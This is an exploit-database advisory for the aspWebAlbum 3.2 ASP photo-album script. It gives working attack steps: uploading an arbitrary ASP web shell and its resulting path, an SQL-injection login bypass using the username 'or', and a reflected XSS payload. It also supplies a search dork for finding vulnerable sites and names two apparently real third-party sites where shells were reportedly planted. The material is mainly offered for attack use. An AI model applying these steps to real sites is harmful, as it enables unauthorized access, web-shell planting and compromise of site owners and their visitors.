aspwebalbum 3.2 - Multiple Vulnerabilities
Author: e.wiZz! type: webapps platform: asp port: date_added: 2008-09-09 date_updated: verified: 1 codes: OSVDB-47915;CVE-2008-6978;OSVDB-47913;CVE-2008-6977;OSVDB-10335;CVE-2004-1553 tags: aliases: screenshot_url: application_url: raw file: 6420.txt
#################################################################################################
#
#-# Discovered by Alemin_Krali #
#
#-# aspWebAlbum 3.2 #
#
#-# Script Download "http://www.fullrevolution.com" #
#
#-# aspWebAlbum 3.2 Single Site License | $60.00 : ) #
#
#-# HomePage al3m.blogspot.com #
#
#-# alemin@windowslive.com #
#
#-# Dork ? : album.asp?pic= .jpg cat= #
#
#
#
#--# 1-Arbitrary File Upload Exploit [AspWebAlbum All Versions] #
#
http://www.site.com/path/album.asp?action=uploadmedia&cat=Real Category Name! #
#
and your shell adress: #
#
http://www.site.com/path/album/categories/Real Category Name!/pics/yourshell.asp #
#
#
ex:1 #
http://www.assisteurope.net/album/categories/Beslan%202005/Memorials/pics/cyberspy.asp #
#
ex:2 #
http://peopleablaze.net/ClientData/1038/CustomApps/PhotoAlbum//album/categories/ #
Ablaze rally 9-24-06/pics/klasvayv.asp #
#
#
#--# 2-Admin Bypass [AspWebAlbum 3.2] #
#
#
http://site.com/path/album.asp?action=login #
#
ASP/MS SQL Server login syntax #
#
Username:'or' #
Password:anything #
#
#
#--# 3-Xss Vulnerability [AspWebAlbum 3.2] #
#
http://site.com/album/album.asp?action=summary&message=<script>alert('xss')</script>&from=login #
#
##################################################################################################
# milw0rm.com [2008-09-10]